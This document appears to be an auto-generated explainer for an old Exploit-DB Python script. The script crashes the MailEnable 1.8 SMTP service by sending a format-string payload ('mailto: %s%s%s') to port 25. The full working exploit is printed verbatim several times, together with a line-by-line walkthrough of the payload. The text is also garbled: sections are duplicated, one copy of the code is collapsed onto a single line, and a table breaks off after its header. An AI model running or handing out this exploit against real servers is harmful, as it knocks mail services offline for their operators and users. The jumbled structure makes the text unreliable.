MailEnable 1.8 Remote Format String Denial of Service Exploit Explained

What this paper is

This paper details a Denial of Service (DoS) vulnerability in MailEnable version 1.8. The vulnerability is caused by a format string bug, which allows an attacker to crash the MailEnable service by sending a specially crafted email address. The exploit code provided demonstrates how to trigger this vulnerability by connecting to the target server's SMTP port and sending a malformed MAIL FROM command.

Simple technical breakdown

Mail servers, like MailEnable, listen for commands on specific ports, typically port 25 for SMTP. When a client sends a MAIL FROM: command, the server expects a valid email address. This exploit sends a string that includes format specifiers (like %s) instead of a proper email address. If the MailEnable server improperly handles these format specifiers when logging or processing the MAIL FROM command, it can lead to a crash. Format string vulnerabilities occur when user-supplied input is used directly in a format string function (like printf in C) without proper sanitization, allowing attackers to read or write to memory, or in this case, cause a crash.

Complete code and payload walkthrough

The provided Python script is designed to exploit the format string vulnerability in MailEnable 1.8.

##################################################################
#                                                                #
#               See-security Technologies ltd.                   #
#                                                                #
#                http://www.see-security.com                     #
#                                                                #
##################################################################
#                                                                #
#          MailEnable 1.8 Format String DoS exploit              #
#                                                                #
#                Discovered by Mati Aharoni                      #
#                                                                #
#                   Coded by tal zeltzer                         #
#                                                                #
##################################################################


import sys
import time
import socket


def PrintLogo():
	print "##################################################################"
	print "#                                                                #"
	print "#               See-security Technologies ltd.                   #"
	print "#                                                                #"
	print "#                http://www.see-security.com                     #"
	print "#                                                                #"
	print "##################################################################"
	print "#"+" "*64+"#"
	print "#          MailEnable 1.8 Format String DoS exploit              #"
	print "#"+" "*64+"#"
	print "#                Discovered by Mati Aharoni                      #"
	print "#                                                                #"
	print "#                   Coded by tal zeltzer                         #"
	print "#"+" "*64+"#"
	print "#"*66+"\n"


PrintLogo()
if (len(sys.argv) != 2):
	print "\n\n"
	print sys.argv[0] + " [Target Host]"
	sys.exit()
sSmtpSocket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
print "[-] Connecting to " + sys.argv[1]
sSmtpSocket.connect((sys.argv[1],25))
print "[-] Connected to " + sys.argv[1]
print "[-] Sending malformed packet"
sSmtpSocket.send("mailto: %s%s%s\r\n")
sSmtpSocket.close()
print "[-] Malformed packet sent"


# milw0rm.com [2005-03-17]

Let's break down the code:

Header Comments:
- ################################################################## to #"*66+"\n": These are informational comments indicating the source (See-security Technologies), the nature of the exploit (MailEnable 1.8 Format String DoS), the discoverer (Mati Aharoni), and the coder (tal zeltzer). This is standard practice for exploit code to provide attribution and context.
Import Statements:
- import sys: Imports the sys module, which provides access to system-specific parameters and functions. It's used here for command-line argument handling (sys.argv) and exiting the script (sys.exit).
- import time: Imports the time module, which provides various time-related functions. Although imported, it's not explicitly used in this simplified exploit.
- import socket: Imports the socket module, which provides low-level networking interface. This is crucial for establishing network connections and sending data.
PrintLogo() Function:
- def PrintLogo():: Defines a function named PrintLogo.
- print "...": This block of print statements outputs the header information to the console when the function is called. It's purely for display and does not affect the exploit's functionality.
Logo Display and Argument Check:
- PrintLogo(): Calls the PrintLogo function to display the header.
- if (len(sys.argv) != 2):: Checks if the number of command-line arguments is not equal to 2. sys.argv[0] is the script name itself, so we expect one additional argument: the target host.
- print "\n\n": Prints two newlines for spacing.
- print sys.argv[0] + " [Target Host]": Informs the user about the correct usage of the script, showing the script name followed by the expected [Target Host] argument.
- sys.exit(): Terminates the script if the correct number of arguments is not provided.
Socket Initialization and Connection:
- sSmtpSocket = socket.socket(socket.AF_INET,socket.SOCK_STREAM): Creates a new socket object.
  - socket.AF_INET: Specifies the address family as IPv4.
  - socket.SOCK_STREAM: Specifies the socket type as a TCP socket, which is used for reliable, connection-oriented communication (like SMTP).
- print "[-] Connecting to " + sys.argv[1]: Prints a message indicating the script is attempting to connect to the target host provided as the first command-line argument (sys.argv[1]).
- sSmtpSocket.connect((sys.argv[1],25)): Establishes a TCP connection to the target host (sys.argv[1]) on port 25 (the standard SMTP port).
- print "[-] Connected to " + sys.argv[1]: Prints a confirmation message once the connection is successful.
Sending the Malformed Packet:
- print "[-] Sending malformed packet": Informs the user that the exploit payload is about to be sent.
- sSmtpSocket.send("mailto: %s%s%s\r\n"): This is the core of the exploit. It sends a string to the connected SMTP server.
  - "mailto: ": This part is likely intended to mimic the start of a MAIL FROM: command, although the actual command MAIL FROM: is not explicitly sent. The vulnerability is triggered by how the server processes the argument to such a command.
  - %s%s%s: These are format specifiers. In C-like printf functions, %s tells the function to expect a string argument and print it. When these are present in a string that is then passed to a vulnerable printf-style function without corresponding string arguments, the function will attempt to read from memory locations indicated by the stack, potentially leading to a crash if it encounters invalid memory addresses or tries to interpret arbitrary data as pointers. The repetition of %s is to increase the chances of hitting a problematic memory location or triggering multiple read operations.
  - \r\n: This is the Carriage Return and Line Feed sequence, which signifies the end of a command line in many network protocols, including SMTP.
- sSmtpSocket.close(): Closes the TCP connection to the server.
- print "[-] Malformed packet sent": Confirms that the data has been sent and the connection closed.
# milw0rm.com [2005-03-17]:
- This is a comment indicating the source of the exploit code on the milw0rm.com exploit database and the publication date.

Mapping of code fragments to practical purpose:

| Code Fragment/Block | Practical Purpose

Original Exploit-DB Content (Verbatim)

##################################################################
#                                                                #
#               See-security Technologies ltd.                   #
#                                                                #
#                http://www.see-security.com                     #
#                                                                #
##################################################################
#                                                                #
#          MailEnable 1.8 Format String DoS exploit              #
#                                                                #
#                Discovered by Mati Aharoni                      #
#                                                                #
#                   Coded by tal zeltzer                         #
#                                                                #
##################################################################


import sys
import time
import socket


def PrintLogo():
	print "##################################################################"
	print "#                                                                #"
	print "#               See-security Technologies ltd.                   #"
	print "#                                                                #"
	print "#                http://www.see-security.com                     #"
	print "#                                                                #"
	print "##################################################################"
	print "#"+" "*64+"#"
	print "#          MailEnable 1.8 Format String DoS exploit              #"
	print "#"+" "*64+"#"
	print "#                Discovered by Mati Aharoni                      #"
	print "#                                                                #"
	print "#                   Coded by tal zeltzer                         #"
	print "#"+" "*64+"#"
	print "#"*66+"\n"


PrintLogo()
if (len(sys.argv) != 2):
	print "\n\n"
	print sys.argv[0] + " [Target Host]"
	sys.exit()
sSmtpSocket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
print "[-] Connecting to " + sys.argv[1]
sSmtpSocket.connect((sys.argv[1],25))
print "[-] Connected to " + sys.argv[1]
print "[-] Sending malformed packet"
sSmtpSocket.send("mailto: %s%s%s\r\n")
sSmtpSocket.close()
print "[-] Malformed packet sent"


# milw0rm.com [2005-03-17]

What this paper is

Simple technical breakdown

Complete code and payload walkthrough

The provided Python script is designed to exploit the format string vulnerability in MailEnable 1.8.

################################################################## # # # See-security Technologies ltd. # # # # http://www.see-security.com # # # ################################################################## # # # MailEnable 1.8 Format String DoS exploit # # # # Discovered by Mati Aharoni # # # # Coded by tal zeltzer # # # ################################################################## import sys import time import socket def PrintLogo(): print "##################################################################" print "# #" print "# See-security Technologies ltd. #" print "# #" print "# http://www.see-security.com #" print "# #" print "##################################################################" print "#"+" "*64+"#" print "# MailEnable 1.8 Format String DoS exploit #" print "#"+" "*64+"#" print "# Discovered by Mati Aharoni #" print "# #" print "# Coded by tal zeltzer #" print "#"+" "*64+"#" print "#"*66+"\n" PrintLogo() if (len(sys.argv) != 2): print "\n\n" print sys.argv[0] + " [Target Host]" sys.exit() sSmtpSocket = socket.socket(socket.AF_INET,socket.SOCK_STREAM) print "[-] Connecting to " + sys.argv[1] sSmtpSocket.connect((sys.argv[1],25)) print "[-] Connected to " + sys.argv[1] print "[-] Sending malformed packet" sSmtpSocket.send("mailto: %s%s%s\r\n") sSmtpSocket.close() print "[-] Malformed packet sent" # milw0rm.com [2005-03-17]

Let's break down the code:

Header Comments:

################################################################## to #"*66+"\n": These are informational comments indicating the source (See-security Technologies), the nature of the exploit (MailEnable 1.8 Format String DoS), the discoverer (Mati Aharoni), and the coder (tal zeltzer). This is standard practice for exploit code to provide attribution and context.

Import Statements:

import sys: Imports the sys module, which provides access to system-specific parameters and functions. It's used here for command-line argument handling (sys.argv) and exiting the script (sys.exit).
import time: Imports the time module, which provides various time-related functions. Although imported, it's not explicitly used in this simplified exploit.
import socket: Imports the socket module, which provides low-level networking interface. This is crucial for establishing network connections and sending data.

PrintLogo() Function:

def PrintLogo():: Defines a function named PrintLogo.
print "...": This block of print statements outputs the header information to the console when the function is called. It's purely for display and does not affect the exploit's functionality.

Logo Display and Argument Check:

PrintLogo(): Calls the PrintLogo function to display the header.
if (len(sys.argv) != 2):: Checks if the number of command-line arguments is not equal to 2. sys.argv[0] is the script name itself, so we expect one additional argument: the target host.
print "\n\n": Prints two newlines for spacing.
print sys.argv[0] + " [Target Host]": Informs the user about the correct usage of the script, showing the script name followed by the expected [Target Host] argument.
sys.exit(): Terminates the script if the correct number of arguments is not provided.

Socket Initialization and Connection:

sSmtpSocket = socket.socket(socket.AF_INET,socket.SOCK_STREAM): Creates a new socket object.
- socket.AF_INET: Specifies the address family as IPv4.
- socket.SOCK_STREAM: Specifies the socket type as a TCP socket, which is used for reliable, connection-oriented communication (like SMTP).
print "[-] Connecting to " + sys.argv[1]: Prints a message indicating the script is attempting to connect to the target host provided as the first command-line argument (sys.argv[1]).
sSmtpSocket.connect((sys.argv[1],25)): Establishes a TCP connection to the target host (sys.argv[1]) on port 25 (the standard SMTP port).
print "[-] Connected to " + sys.argv[1]: Prints a confirmation message once the connection is successful.

Sending the Malformed Packet:

print "[-] Sending malformed packet": Informs the user that the exploit payload is about to be sent.
sSmtpSocket.send("mailto: %s%s%s\r\n"): This is the core of the exploit. It sends a string to the connected SMTP server.
- "mailto: ": This part is likely intended to mimic the start of a MAIL FROM: command, although the actual command MAIL FROM: is not explicitly sent. The vulnerability is triggered by how the server processes the argument to such a command.
- %s%s%s: These are format specifiers. In C-like printf functions, %s tells the function to expect a string argument and print it. When these are present in a string that is then passed to a vulnerable printf-style function without corresponding string arguments, the function will attempt to read from memory locations indicated by the stack, potentially leading to a crash if it encounters invalid memory addresses or tries to interpret arbitrary data as pointers. The repetition of %s is to increase the chances of hitting a problematic memory location or triggering multiple read operations.
- \r\n: This is the Carriage Return and Line Feed sequence, which signifies the end of a command line in many network protocols, including SMTP.
sSmtpSocket.close(): Closes the TCP connection to the server.
print "[-] Malformed packet sent": Confirms that the data has been sent and the connection closed.

# milw0rm.com [2005-03-17]:

This is a comment indicating the source of the exploit code on the milw0rm.com exploit database and the publication date.

Mapping of code fragments to practical purpose:

| Code Fragment/Block | Practical Purpose

Original Exploit-DB Content (Verbatim)